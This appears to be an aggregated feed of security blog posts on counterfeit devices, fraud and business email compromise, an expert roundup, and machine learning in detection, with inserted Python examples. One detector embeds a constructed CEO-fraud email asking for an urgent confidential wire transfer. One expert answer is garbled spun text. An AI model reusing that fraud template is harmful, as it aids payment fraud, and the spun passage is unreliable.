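One way to run that validation step, written here as an added example rather than code from the article. It reconciles what the asset database asserts (vendor, model, hardware version, serial) against what each device reports when polled, flags relabelled units and cloned serials, and gates a firmware push on the device’s own report rather than its label, which is the UDI/patching failure mode described in the medical device section above. The banner format, the field names and the sample records are constructed for illustration; a real implementation would parse the vendor’s actual sysDescr or CLI output.

```python
"""Reconcile an asserted device inventory against what the devices report."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class InventoryRecord:
    """What procurement / the asset database says we bought."""
    asset_id: str
    vendor: str
    model: str
    hw_version: str
    serial: str


@dataclass(frozen=True)
class Observation:
    """What the device itself reported when polled (hypothetical fields:
    the serial read from the chassis and an SNMP-style sysDescr banner)."""
    asset_id: str
    serial: str
    sys_descr: str


# Hypothetical banner layout: "<vendor> <model> hw<version> sw<build>"
_BANNER = re.compile(r"^(?P<vendor>\S+) (?P<model>\S+) hw(?P<hw>[\w.]+) sw(?P<sw>[\w.]+)$")


def parse_banner(sys_descr: str) -> Optional[Dict[str, str]]:
    """Extract vendor/model/hw/sw from the banner, or None if it does not fit."""
    m = _BANNER.match(sys_descr.strip())
    return m.groupdict() if m else None


def validate_inventory(records: List[InventoryRecord],
                       observations: List[Observation]) -> List[Tuple[str, str]]:
    """Return sorted (asset_id, finding) pairs for every inventory line that
    the observed device contradicts, or that was never observed at all."""
    findings: List[Tuple[str, str]] = []
    obs_by_asset = {o.asset_id: o for o in observations}
    # The same serial showing up on two chassis is a classic counterfeit tell.
    serial_counts = Counter(o.serial for o in observations)
    for rec in records:
        obs = obs_by_asset.get(rec.asset_id)
        if obs is None:
            findings.append((rec.asset_id, "unobserved"))
            continue
        banner = parse_banner(obs.sys_descr)
        if banner is None:
            findings.append((rec.asset_id, "unparseable_banner"))
            continue
        if obs.serial != rec.serial:
            findings.append((rec.asset_id, "serial_mismatch"))
        if serial_counts[obs.serial] > 1:
            findings.append((rec.asset_id, "duplicate_serial"))
        if (banner["vendor"].lower(), banner["model"].lower()) != (rec.vendor.lower(), rec.model.lower()):
            findings.append((rec.asset_id, "model_mismatch"))
        elif banner["hw"] != rec.hw_version:
            findings.append((rec.asset_id, "version_mismatch"))
    return sorted(findings)


def patch_applies(obs: Observation, vendor: str, model: str, hw_version: str) -> bool:
    """Gate a firmware push on what the device reports, never on its label."""
    banner = parse_banner(obs.sys_descr)
    if banner is None:
        return False
    return (banner["vendor"].lower(), banner["model"].lower(), banner["hw"]) == \
        (vendor.lower(), model.lower(), hw_version)


# Constructed sample: the inventory claims four "X" routers at hardware v2.
INVENTORY = [
    InventoryRecord("r1", "XYZ", "X", "2", "SN-1001"),
    InventoryRecord("r2", "XYZ", "X", "2", "SN-1002"),
    InventoryRecord("r3", "XYZ", "X", "2", "SN-1003"),
    InventoryRecord("r4", "XYZ", "X", "2", "SN-1004"),
]
OBSERVED = [
    Observation("r1", "SN-1001", "XYZ X hw2 sw7.1.3"),
    Observation("r2", "SN-1002", "XYZ X hw1 sw5.0.9"),  # relabelled older unit
    Observation("r3", "SN-1001", "XYZ X hw2 sw7.1.3"),  # cloned serial
    # r4 never answered the poll
]

if __name__ == "__main__":
    for asset, finding in validate_inventory(INVENTORY, OBSERVED):
        print(f"{asset}: {finding}")
```

Run against the sample, r2 is caught as a v1 wearing a v2 label, r3 shares a serial with r1 (so both are flagged for a human to look at), and r4 is reported as never seen; the v2 firmware is allowed for r1 but refused for r2 regardless of what the asset database says.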

Although the impacts of counterfeiting-for-greed won’t be only security related (e.g. malfunctioning medical devices), security organizations are the best positioned to lead these efforts.

The post Cybersecurity Leaders Are Talking A Lot About Counterfeit Devices appeared first on .

Cybercrime and Fraud Part 1: Modern Tales of Piracy and Plunder

Calico Jack, Captain Blood, and Blackbeard. So many recognizable stories, books, and movies have been made about the period of stealing and looting exemplified by the golden age of piracy. Time will tell whether we see such romanticized stories of dashing rogues based on the new golden age of criminality that we now live in. In fact, if you look at the FBI’s statistics, the internet has enabled cybercriminals to increase their ill-gotten gains by 700% in 10 years (2007-2017). To put that in perspective, when pirates looted and plundered their way across the seven seas, the top 20 pirates ever stole about $615.5 million when adjusted to 2017 dollars. Flash forward several hundred years and compare that to the takings from cybercrime in the US alone, where the FBI has just released new estimates putting losses at more than $2.7 billion in 2018!

In this series of blogs, I’ll be exploring cybercrime and fraud, outlining some of the strategies that you can adopt to help mitigate risk, and how you can use Cisco products and technologies to help implement those strategies.

So, let’s delve into this golden age of criminality in a little more detail. First, it’s important to realize that the scale of this illicit profit has brought with it a tremendous amount of professionalism. This is illustrated by the fact that while losses have increased 700%, the number of incidents has only increased by 50%, resulting in a much higher loss per incident. Of course, the FBI only has a US-centric view, so how representative is it globally? If we consider research from the Center for Strategic and International Studies (CSIS), the estimated global cost of cybercrime is 0.59% to 0.8% of GDP ($445 billion to $608 billion). If we then compare that to the value the UN Office on Drugs and Crime (UNODC) assigns to the global illicit drugs trade, 0.5% to 0.6% of GDP, you realize that the cybercrime market is at least as big as, if not bigger than, the global trade in illicit drugs! With such profits obtained at a fraction of the risk of other criminal enterprises, it’s easy to see why cybercrime remains an attractive and growing area for professional criminals.

So how much could it continue to grow? Are we already at peak cybercrime? In October 2017, BITKOM (German Association for Information Technology, Telecommunications and New Media) published a survey showing that 49% of German internet users had been a victim of cybercrime. Compare this to an analysis from the US Department of Justice of the Lifetime Likelihood of Victimization, which estimated that 99% of people would be a victim of robbery at least once and that 87% would be a victim three or more times, and you can see that, depressingly, there appears to remain a significant growth prospect for cybercrime.

So what’s driving this explosive growth in cybercrime? Interestingly enough, it’s actually a new form of a very old crime: Fraud. And by old, I mean really old! They say the earliest recorded form of fraud is the story of Hegestratos in 300 BC! Hegestratos took out a large loan for cargo secured against the value of his ship. When the ship arrived, and the cargo was sold, the lender would be repaid with interest. If the loan was not repaid, the lender had security in the form of the ship. However, if the ship sank, the lender lost both the loan and the security. Needless to say, Hegestratos figured it was easier to sink the ship, save the cargo and sell it and pocket the loan for good measure! What’s remarkable is how, since those days, fraud has evolved as time, technology, and most importantly, the law has advanced. After all, why even bother going to all the trouble of having a ship if you can just pretend to have one? This was made an offense in the UK by as early as 1541 (obtaining property by false or counterfeit token). Once again, fraud evolved so that by 1757 the law would need to be updated to the broader concept of false representation. In the US, with its larger geography, the symbiotic evolution of fraud, technology, and the law are even more clear where counterfeiting laws of 1797 evolved into false claims in 1863, mirroring the evolution of the law in the UK before then having to add mail fraud in 1872 and then wire fraud in 1952. At each stage you can see how criminals are the first to adapt and exploit the opportunities new technology provides for fraud before the defenders can catch up.

Today, little has changed as we continue to see the same scenarios playing out. According to the German Federal Police division responsible for crime, the Bundeskriminalamt (BKA), 99.4% of all recorded cybercrime losses come from fraud. The emphasis here is on recorded losses, as the BKA makes some good points about the difficulty of truly quantifying cybercrime losses, especially intangible ones such as reputational or brand impact. Cross-referencing these numbers with the annual Internet Crime Report from the FBI Internet Crime Complaint Center (IC3), some quick addition reveals that all forms of fraud accounted for approximately 85% of the overall number, validating the BKA’s approach. In fact, IC3 specifically calls out the losses associated with two forms of fraud known as Business Email Compromise (BEC) and Email Account Compromise (EAC). These are two variations on a fraud in which the criminals use social engineering, deception, or other intrusion techniques to conduct unauthorized transfers of funds.

The classic example of this is when the person responsible for finance or supplier payments receives an email purportedly from the Chief Executive Officer (CEO) demanding the urgent payment of a supplier via wire transfer. Of course, the email isn’t from the CEO, and the account details belong to a money mule, often another unsuspecting person, who will transfer the funds on again. By the time the fraud has been identified, the money has moved several times through various accounts and potentially countries and will rarely be recovered. Emphasizing the earlier point regarding the professional nature of this type of crime, the FBI said the perpetrators are “transnational criminal organizations that employ lawyers, linguists, hackers, and social engineers” who “may spend weeks or months studying the organization’s vendors, billing systems, and the CEO’s style of e-mail communication and even his or her travel schedule.” The gains for the criminal are staggering: in its 2016, 2017 and 2018 reports, the FBI IC3 identified BEC/EAC as a hot topic and estimated the losses in 2018 at nearly $1.4 billion.
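The scenario above leaves header and wording traces that a mail gateway or SIEM rule can score before the payment clerk ever sees the message. The following is an added example, not code from the Cisco post: it checks for an executive’s display name on an address the directory does not know, a sender domain one typo away from the company’s own, a Reply-To that diverts the conversation to a third domain, and payment wording wrapped in urgency or secrecy. The executive directory, the internal domain, the term list and both sample messages are constructed for illustration; EAC (a genuinely compromised internal mailbox) would pass the first three checks and is out of scope here.

```python
"""Score an RFC 5322 message for the CEO-fraud pattern described above."""
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr
from typing import List

# Assumed directory: display names worth impersonating and the only
# address each one legitimately sends from.
EXECUTIVES = {"jane doe": "jane.doe@example.com"}
INTERNAL_DOMAINS = {"example.com"}
# Wording that pairs a payment instruction with pressure or secrecy.
PRESSURE_TERMS = ("wire transfer", "urgent", "today", "confidential", "new account")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; used to spot look-alike domains (examp1e.com)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def analyse_message(raw: bytes) -> List[str]:
    """Return the reasons the message looks like BEC; an empty list is clean."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    from_name, from_addr = parseaddr(str(msg.get("From", "")))
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    from_domain = domain_of(from_addr)
    reasons: List[str] = []

    # 1. An executive's display name on an address the directory does not know.
    known = EXECUTIVES.get(from_name.strip().lower())
    if known and from_addr.lower() != known:
        reasons.append("executive display name on unexpected address")

    # 2. Sender domain is one character away from ours.
    if from_domain not in INTERNAL_DOMAINS and any(
        edit_distance(from_domain, d) <= 1 for d in INTERNAL_DOMAINS
    ):
        reasons.append("look-alike sender domain")

    # 3. Replies silently diverted to a third domain.
    if reply_addr and domain_of(reply_addr) != from_domain:
        reasons.append("Reply-To domain differs from From domain")

    # 4. A payment instruction wrapped in urgency or secrecy.
    body = msg.get_body(preferencelist=("plain",))
    text = (str(msg.get("Subject", "")) + " " + (body.get_content() if body else "")).lower()
    if sum(term in text for term in PRESSURE_TERMS) >= 2:
        reasons.append("payment request with pressure/secrecy wording")
    return reasons


def is_suspicious(raw: bytes) -> bool:
    """Two independent signals are enough to hold the message for review."""
    return len(analyse_message(raw)) >= 2


# Constructed samples (not real traffic).
BEC_SAMPLE = b"""\
From: "Jane Doe" <jane.doe@examp1e.com>
Reply-To: <jane.doe.ceo@mail-relay.net>
To: payments@example.com
Subject: Urgent: supplier payment
Content-Type: text/plain; charset=utf-8

Please process the wire transfer to the supplier's new account today.
Keep this confidential until I am back from my trip.
"""

LEGIT_SAMPLE = b"""\
From: "Jane Doe" <jane.doe@example.com>
To: payments@example.com
Subject: Lunch next week
Content-Type: text/plain; charset=utf-8

Are you free for lunch on Tuesday?
"""

if __name__ == "__main__":
    for label, raw in (("bec", BEC_SAMPLE), ("legit", LEGIT_SAMPLE)):
        print(label, is_suspicious(raw), analyse_message(raw))
```

The threshold of two signals is deliberate: urgent wording alone is how real CEOs write, and a lone Reply-To mismatch is common with ticketing systems, but a look-alike domain plus diverted replies plus a wire request is the pattern the FBI describes, and the genuine message from the same executive scores zero.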

How does this compare with losses from other forms of cybercrime? Well, in 2018, the FBI statistic for losses due to another popular form of cybercrime, the classic corporate data breach, was $117.7 million, or 8% of the loss due to BEC/EAC. Looking at the state of California within the FBI statistics, we see that BEC/EAC is the single biggest cause of losses, accounting for 33% of the overall losses due to any form of cybercrime. So, has this risk peaked? A survey from the credit agency Experian found that 72% of businesses had a growing concern about fraud in 2017 and that 63% of them had experienced the same or higher losses due to fraud, pointing to a real and growing risk. It’s worth bearing in mind that, with the FBI’s estimated total losses from BEC/EAC now exceeding $5 billion, the annual losses increased 78% between 2016 and 2017 and again by 92% between 2017 and 2018. Bad as it is, things may continue to get a lot worse.

So, what is to be done? In the next blog post, I’ll be talking about some of the strategies, products, and technologies that can help address and mitigate the issues I discussed in this blog. Of course, I welcome your thoughts, comments and feedback so please do take the time to let me know your thoughts!

The post Cybercrime and Fraud Part 1: Modern Tales of Piracy and Plunder appeared first on Cisco Blog.

Cyber Security + Compliance Controls: What Does It All Mean, Rick?

I’m sure you have all seen the Rickie Fowler commercial where the interviewer rants about all of the confusing financial terms involved with getting a mortgage. Confusion in Cyber Security: Throughout my career, I have worked with hundreds of organizations. Regardless of the vertical or size of the […]

The post Cyber Security + Compliance Controls: What Does It All Mean, Rick? appeared first on The State of Security.

Expert Roundup: Why Can’t Cybersecurity Be Simpler?

Time and time again, people ask:

Why can’t cybersecurity be simpler?

This question is not asked just by regular users confused by the “techno-babble” or enraged by information leaks.

It’s also increasingly asked by business owners, analysts, journalists and even the people involved in securing information, whether sysadmins for small companies or even high-level executives in multinational organizations.

This is why we went straight to the source for the best responses. Last time, we asked specialists whether they think Internet security is a losing battle, and their responses were memorable. Today, we asked highly accomplished cybersecurity experts from various infosec fields another tricky question, and they were gracious enough to provide their insights.

If you’re a regular user angry at your data being exposed to various leaks and cyber attacks, you will get a behind-the-scenes look at the reasons why these incidents happen. If you’re someone involved in handling customers’ data, these perspectives will prove to be just as illuminating.

We wanted to provide you with valuable, often hard-to-find perspectives, and we believe this makes a great start on answering a simple-looking but actually difficult and many-sided question.

Why can’t cybersecurity be simpler?

Use the links below to quickly navigate the experts’ replies.

  • Brent White (BITKILL3R) – Senior Security Consultant at NTT Security and the founder of the Nashville DEF CON group
  • Ian Thornton-Trump – Cyber Vulnerability & Threat Hunting Lead at Ladbrokes Coral Group and CTO of Octopi Managed Services Inc
  • Isaac Kohen – Founder and CEO of Teramind, an employee monitoring and insider threat prevention platform
  • Joe Ward – Senior Security Analyst at Bishop Fox
  • John Mason – Cyber security and privacy enthusiast, analyst for TheBestVPN
  • Peter Buttler – Cyber security journalist, consultant at PrivacyEnd
  • Albert Ahdoot – Business Development Director at Colocation America
  • Harsh Agrawal – Founder and CEO of ShoutMeLoud.com

Brent White

Brent is a Senior Security Consultant at NTT Security and the founder of the Nashville DEF CON group. He can be found at We Hack People, a website dedicated to red team and social engineering assessments.

Security isn’t a convenience because it requires being careful and demands that users be diligent to take extra steps to follow rules.

I focus on social engineering and physical security and see this come in to play on a regular basis when a company hires me to break into their buildings.

For example, tailgating (piggybacking) is one of the most common ways that I gain unauthorized access to a business.

This could be mitigated if employees followed their security awareness training and made sure that everyone who entered was scanning their badge, and that the badge being scanned was valid.

However, this takes time and requires people who are already focused on their own paths and agendas to slow down and be more aware of their surroundings.

Asking them to change their thought process and to “validate” each person coming in the door isn’t something that’s going to happen overnight.

You also have the human kindness factor that is innate in most of us, where we naturally want to help out someone in need.

This is easily exploited by a social engineer in many ways, whether it’s pretending to need help opening the door because their arms are full, or the social engineer can simply tailgate in, be in an “argument” on the phone (making the situation uncomfortable on purpose).

People will want to avoid a potential confrontation with someone who already appears to be upset about something.

Once an attacker has physical access to data, it’s pretty much “game over”.

Companies need to go beyond the required annual “security awareness” training PowerPoints if they want to get serious about addressing these issues.

Regular drills such as internal phishing campaigns, testing unauthorized entry, and even full red team assessments are a good way to consistently check the level of awareness and response within an organization.

Employees should be incentivized to find and report something, and have a clear path of how and who to report incidents to in a way that is easy and convenient for them. 

It’s very difficult to incorporate a security mindset 100% into the culture of a company. But, when it’s done correctly, it can be a very effective countermeasure against potential threats.

Ian Thornton-Trump

Ian is the Cyber Vulnerability & Threat Hunting Lead at Ladbrokes Coral Group and CTO of Octopi Managed Services Inc. He can be reached on Twitter here.

Security can be simple, but it won’t ever be because business is not simple. And humans are not simple. And security today is in some malevolent Venn diagram right in the damn center of what can only be described for 80% (ish) of the GNP of a country as the small-medium business/enterprise (SMB/SME in the EU UK) security nightmare.

It’s not easy being profitable and everyone from the governments to the regulators (hackers in suits) to the cyber criminals (hackers in hoodies) is out to attack the hard work of organizations which strive to make an honest living.

I’m a cybersecurity Captain Willard.

“I was going to the worst cyber security situation in the world and I didn’t even know it yet. Weeks away and hundreds of dollars/pounds/euros spent on a security project that snaked through the compliance regulations like a main circuit cable plugged straight into the businesses cybersecurity posture. It was no accident that I got to be the caretaker of a business’s cybersecurity any more than being back in some SANS certification course was an accident. There is no way to tell the businesses’ cybersecurity story without telling my own. And if that business story is really a confession, then this may be my own as well.”

That’s where we are today. Most businesses are scared of an existential threat from criminal hackers (or regulatory authorities) and are turning to security vendors and consultants to solve their security problem.

The reality is: the problem is cultural and societal.

We reward efficiency over good decision making, we sacrifice security for convenience and we consistently place profit in front of pragmatism.

Cybersecurity is complicated because life is complicated and there is no perfection. We can’t be a hundred percent secure – so the rhetoric and fear-mongering of vendors and security professionals has given in to a feeling of helplessness and disparity among the 80%.

If this short essay strikes you as incoherent, it only matches the vast majority of SMB/SME firms’ approaches to cybersecurity: cybersecurity perfection is not attainable.

Attempting to apply the binary model of security and compliance to the “grayness” of business, life and society only ends in disappointment.

If this dystopian view makes you angry or causes you discomfort – good, do something about it – change the security culture, change the business world.

It may never be simple, but you may be able to keep the doors open.

Isaac Kohen

Isaac is the founder and CEO of Teramind, an employee monitoring and insider threat prevention platform that detects, records, and prevents malicious user behavior. He can be reached at ikohen@teramind.co.

As much as we wish life to be straightforward and simple, reality seems to tell us a different story.

The reality around security is it feels complicated, dynamic and perpetually a ‘catch up’ game in keeping company data secure.

With new technology advances like the internet of things (IoT), the security landscape becomes more entangled, and companies find themselves with new vulnerabilities and ‘patching’ new security holes in their IT infrastructure.

With many moving parts, it’s not a surprise that the traditional approach to a security plan doesn’t seem possible.

In my opinion, the best way to prepare for the future is to move from a protection to a prevention security mindset.

This progressive strategy looks at data security in ‘real time’ meaning security isn’t viewed as an afterthought, rather it’s using data, monitoring, and analytics to anticipate security breaches and adapt quickly to changing security landscapes.

Joe Ward

Joe is a Senior Security Analyst at Bishop Fox. His thoughts on infosec can be found here.

First, there is an accelerating rate of change and complexity in systems.

Driven by market forces to deliver more features and derive more value, new technologies are invented every day, and old technologies are being leveraged in new and interesting ways.

Second, there has been historically strong pressure to maintain backward compatibility to the point that the foundation of newer technologies is built on legacy systems riddled with security defects that can never be fixed.

Ultimately I think the increasing pace of “what CAN we do” has overshadowed the fundamental question of “what SHOULD we do”, leaving the question of “what can we do SAFELY” unasked.

John Mason

John is a cybersecurity and privacy enthusiast, working as an analyst for TheBestVPN. He can be reached on Twitter.

$3.8 million.

That’s the average cost of one cyber hacker who penetrates your security and wreaks havoc on your business.

Online security isn’t just a matter of protecting your website’s IP address. You are protecting your customers from identity theft and your business from a lawsuit.

Of course, those are just two examples of potential damage. Hackers intent on disrupting your business for their own gain won’t stop at mere annoyance. They’ll do everything they can to harm your website and take what they want.

Sadly, they’re pretty good at their work. Extremely good.

There’s no shortage of high-ranking companies who’ve fallen victim to a website breach, like Verizon Wireless or Virgin America. All of those hacks damage not only the business but, even worse, they damage customers’ privacy even more.

Which further means that you, as a business, don’t just lose the public’s trust, you lose previously loyal customers.

From restore points and network monitoring to firewalls and malware scanning, each integration protects your business and, more importantly, your customers.

Prioritizing simplicity over thorough security is a mission-critical mistake. One that CEOs from bigger companies who’ve fallen victim will tell you not to make.

Peter Buttler

Peter Buttler is a cybersecurity journalist and a tech reporter. He is the security consultant at PrivacyEnd. You can follow him on Twitter.

Security isn’t an accommodation since it requires being cautious and demands clients to be persistent about finding a way to look after weaknesses.
Cyber-security is complex in light of the fact that our life is never 100% perfect.

We can’t be a hundred percent secure – so the talk of security experts has yielded to a sentiment of weakness among the 70%.
With new innovations like IoT, the security scene turns out to be more complicated, and organizations end up with new vulnerabilities and ‘fixing’ new security flaws in their IT foundation.

Driven by advertising powers to convey more highlights and determine more esteem, new technologies are designed each day, and old technologies are being utilized in new and fascinating ways.

From re-establishing indicates and organizing monitor firewalls and malware filtering, every coordination in cybersecurity protects your business and most importantly your clients.

Albert Ahdoot

Albert is the Business Development Director at Colocation America. He can be reached on Twitter.

Let’s state the obvious: the Internet is always changing. Everyday new technology is created while our current technology systems continue to evolve. The cyberworld, in itself, is a complex system; technology companies are creating new systems and features faster than ever before.

However, this “need for speed” approach is not always benefiting the client and/or business at hand. With the ever-changing landscape of the Internet, cyber attacks are becoming more frequent. Hackers are exploiting the cyber-security shortcuts taken by businesses needing to be the “first to adapt.”

By the time the business implements cybersecurity measures, the cyber attack has already happened, and the hackers have moved on. Cybersecurity is like a massive game of Cat & Mouse meets Whac-A-Mole—once you fix one issue, another pops up. No matter how secure your system is one minute, the next, it can be under attack.

To top it all off, there is a shortage of cybersecurity professionals. As we look to the future of the Internet, we must consider the players involved. While we encourage innovation in the fields of software development, we need to do the same in the realm of cybersecurity. After all, we, as individuals, are relying on technology more than ever to keep us safe – but who is going to keep us safe from our technology?

Thankfully, some businesses understand cybersecurity and its complexity. Let’s all hope businesses, small and large, are utilizing them (for all our sakes).

Harsh Agrawal

Harsh is the founder and CEO of an award-winning blog known as “ShoutMeLoud”. He’s an engineer by education and a blogger by profession. You can reach him on Twitter.

Some guys think that cybersecurity is as simple as affiliate marketing or blogging. After all, it’s just about providing safe methods for internet users to complete their online activities, right?

Well, not quite.

With more and more hackers trying to get hold of sensitive information and finding new, advanced ways to do it, you can never be at ease. It is crucial that people understand no one is safe, especially if they handle their personal information carelessly.

But even if users and companies do take care of the data, unfortunately, a breach occasionally happens.

I mean, do you really think that Equifax, Target, and so many other companies wouldn’t do anything to prevent the scandals that have happened in the past years?

It has to be complicated because the world wide web is such a complicated realm, nothing like people have ever known before.

So, it all boils down to being constantly on guard and finding new and innovative ways to be one step ahead of hackers and frauds.

Conclusion

We would like to thank all the people who participated in this expert roundup for taking the time to answer this question and provide the community with some necessary insights into the fascinating world of cybersecurity.

Do you have another perspective on why security is too complicated? Are you from a different background or feel the need to add to the topic?
We plan to keep this column updated, so if you want to contribute, drop us a line and let’s talk!




The post Expert Roundup: Why Can’t Cybersecurity Be Simpler? appeared first on Heimdal Security Blog.

The State of Machine Learning in 2019

Here we are, almost four whole months into 2019 and machine learning and artificial intelligence are still hot topics in the security world. Or at least that was the impression I had. Our 2019 CISO Benchmark Report however, found that between 2018 and 2019, CISO interest in machine learning dropped from 77% to 67%. Similarly, interest in artificial intelligence also dropped from 74% to 66%.

Now there are a number of reasons why these values could have dropped over a year. Maybe there’s a greater lack of certainty or confidence when it comes to implementing ML. Or perhaps widespread adoption and integration into more organizations has made it less of a standout issue for CISOs. Or maybe the market for ML has finally matured to the point where we can start talking about the outcomes from ML and AI and not the tools themselves.

No matter where you stand on ML and AI, there’s still plenty to talk about when it comes to how we as an industry are currently making use of them. With that in mind, I’d like to share some thoughts on ways we need to view machine learning and artificial intelligence as well as how we need to shift the conversation around them.

More effective = less obvious

I’m still amazed by how machine learning is still a hot topic. That’s not to say it does not deserve to be an area of interest though. I am saying however, that what we should be talking about are the outcomes and capabilities it delivers. Some of you may remember when XML was such a big deal, and everyone could not stop talking about it. Fast forward to today and no one advertises that they use XML since that would just be obvious and users care more about the functionality it enables. Machine Learning will follow along the same path. In time, it will become an essential aspect of the way we approach security and become simply another background process. Once that happens, we can focus on talking about the analytical outcomes it enables.

An ensemble cast featuring machine learning

Anyone who has built an effective security analytics pipeline knows that job one is to ensure that it is resilient to active evasion. Threat actors know as much or more than you do about the detection methods within the environments they wish to penetrate and persist in. The job of security analytics is to find the most stealthy and evasive threat actor activity in the network, and to do this you cannot rely on a single technique. For that detection to happen, you need a diverse set of techniques, all of which complement one another. While a threat actor will be able to evade one or two of them simultaneously, they don’t stand a chance against hundreds of them! Detection in diversity!

To explain this, I would like to use the analogy of a modern bank vault. Vaults employ a diverse set of detection techniques like motion, thermal, and laser arrays; on some physical dimension, an alarm will be tripped, and the appropriate response will ensue. We do the same in the digital world, where machine learning helps us model timing or volumetric aspects of the behavior that are statistically normal so we can signal on outliers. This can be done all the way down at the protocol level, where models are deterministic, or all the way up to the application or users’ behavior, which can sometimes be less deterministic. We have had years to refine these analytical techniques and have published well over 50 papers on the topic in the past 12 years.

The precision and scale of ML

So why then can’t we just keep using lists of bad things and lists of good things? Why do we need machine learning in security analytics and what unique value does it bring us? The first thing I want to say here is that we are not religious about machine learning or AI. To us, it is just another tool in the larger analytics pipeline. In fact, the most helpful analytics comes from using a bit of everything.

If you hand me a list and say, “If you ever see these patterns, let me know about it immediately!” I’m good with that. I can do that all day long and at very high speeds. But what if we are looking for something that cannot be known prior to the list-making act? What if what we are looking for cannot be seen but only inferred? The shadows of the objects but never the objects, if you will. What if we are not really sure what something is or the role it plays in the larger system (i.e., categorization and classification)? All these questions are where machine learning has contributed a great deal to security analytics. Let’s point to a few examples.

The essence of Encrypted Traffic Analytics

Encryption has made what was observable in the network impossible to observe. You can argue with me on this, but mathematics is not on your side, so let’s just accept the fact that deep packet inspection is a thing of the past. We need a new strategy, and that strategy is the power of inference. Encrypted Traffic Analytics is an invention at Cisco whereby we leverage the fact that all encrypted sessions begin unencrypted and that the routers and switches can send us an “Observable Derivative.” This metadata coming from the network is a mathematical shadow of the payloads we cannot inspect directly because they are encrypted. Machine learning helps us train on these observable derivatives so that if their shape and size over time match some malicious behavior, we can bring this to your attention, all without having to deal with decryption.
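The inference step described above, as an added example that is not Cisco’s Encrypted Traffic Analytics code: a nearest-centroid classifier trained only on the metadata of a session (packet lengths and timing, the “observable derivative”), with the flow records constructed here and the feature design an assumption of this example.

```python
"""Added example, not Cisco's Encrypted Traffic Analytics code: classify
TLS sessions from metadata alone (packet lengths and timing, the
"observable derivative") with a nearest-centroid model. All flows below
are constructed sample data; the feature design is an assumption."""
import math
from collections import Counter

# One flow = (signed packet length in bytes, inter-arrival gap in ms) for the
# first packets of a session; positive = client to server, negative = server to client.
BROWSING_FLOWS = [
    [(517, 0), (-1420, 30), (-1420, 1), (-800, 2), (126, 40), (-1420, 35), (-1420, 1), (-600, 3)],
    [(517, 0), (-1420, 22), (-1420, 1), (-1420, 1), (-300, 1), (95, 60), (-1420, 28), (-900, 2)],
    [(517, 0), (-1420, 18), (-1000, 3), (150, 55), (-1420, 25), (-1420, 1), (-1420, 1), (-400, 2)],
]
BEACON_FLOWS = [  # small, regular request/response pairs at a fixed interval
    [(300, 0), (-200, 30000), (300, 30000), (-200, 30000), (300, 30000), (-200, 30000)],
    [(280, 0), (-210, 30000), (280, 30050), (-210, 29950), (280, 30000), (-210, 30000)],
    [(310, 0), (-190, 29900), (310, 30100), (-190, 30000), (310, 30000), (-190, 30000)],
]

LEN_BINS = 6  # |length| // 256, capped: 0-255, 256-511, ..., 1280 and above


def features(flow):
    """Fixed-length vector: client and server length histograms, log of the
    mean gap, and the gap coefficient of variation (beacons are regular)."""
    up, down, gaps = [0.0] * LEN_BINS, [0.0] * LEN_BINS, []
    for length, gap in flow:
        bucket = min(abs(length) // 256, LEN_BINS - 1)
        (up if length > 0 else down)[bucket] += 1
        gaps.append(gap)
    n = float(len(flow))
    mean_gap = sum(gaps) / n
    sd_gap = math.sqrt(sum((g - mean_gap) ** 2 for g in gaps) / n)
    cv = sd_gap / mean_gap if mean_gap else 0.0
    return [c / n for c in up + down] + [math.log1p(mean_gap), cv]


def train(labelled):
    """One centroid per label, computed from (label, flow) pairs."""
    sums, counts = {}, Counter()
    for label, flow in labelled:
        vec = features(flow)
        acc = sums.setdefault(label, [0.0] * len(vec))
        for i, v in enumerate(vec):
            acc[i] += v
        counts[label] += 1
    return {label: [v / counts[label] for v in acc] for label, acc in sums.items()}


def classify(model, flow):
    """Label of the centroid nearest to the flow in feature space."""
    vec = features(flow)
    return min(model, key=lambda label: math.dist(vec, model[label]))


def build_model():
    """Train on the constructed browsing and beacon flows above."""
    labelled = [("browsing", f) for f in BROWSING_FLOWS] + [("beacon", f) for f in BEACON_FLOWS]
    return train(labelled)


if __name__ == "__main__":
    model = build_model()
    unseen = [(517, 0), (-1420, 25), (-1420, 1), (-1420, 1), (-900, 2), (150, 80), (-1420, 40), (-1420, 1)]
    print(classify(model, unseen))  # browsing
```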

Why is this printer browsing Netflix?

Sometimes we are lucky enough to know the identity and role of a user, application, or device as it interacts with systems across the network. The reality is, most days we are far from 100% on this, so machine learning can help us cluster network activity to make an assertion like, “based on the behavior and interactions of this thing, we can call it a printer!” When you are dealing with thousands upon thousands of computers interacting with one another across your digital business, even if you had a list at some point in time, it is likely not up to date. The value of this labeling is not just so that you have objects with the most accurate labels, but so you can infer suspicious behavior based on its trusted role. For example, if a network device is labeled a printer, it is expected to act like a printer, so its future behavior can be predicted. If one day it starts to browse Netflix or checks out some code from a repository, our Stealthwatch software generates an alert for your attention. With machine learning, you can infer from behavior what something is, or, if you already know what something is, you can predict its “normal” behavior and flag any behavior that is “not normal.”

Pattern matching versus behavioral analytics

Lists are great! Hand me a high-fidelity list and I will hand you back high-fidelity alerts generated from that list. Hand me a noisy or low-fidelity list and I will hand you back noise. The definition of machine learning by Arthur Samuel in 1959 is “Field of study that gives computers the ability to learn without being explicitly programmed.” In security analytics, we can use it for just this and have analytical processes that implicitly program a list for you given the activity they observe (the telemetry they are presented). Machine learning helps us implicitly put together a list that could not have been known a priori. In security, we complement what we know with what we can infer through negation. A simple example would be “if these are my sanctioned DNS servers and activities, then what is this other thing here?!” Logically, instead of saying something is A (or a member of set A), we are saying not-A, but that is only practical if we have already closed off the world to {A, B}: not-A is B if the set is closed. If, however, we did not close off the world to a fixed set of members, not-A could be anything in the universe, which is not helpful.
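The two ideas above, the printer that must keep behaving like a printer and the closed-world “not-A” alert built from an implicitly learned list, as one added example that is not Cisco or Stealthwatch code: per-role port allowlists are learned from constructed baseline telemetry, clusters are named from a partial inventory, and anything outside a role’s learned set is reported by negation.

```python
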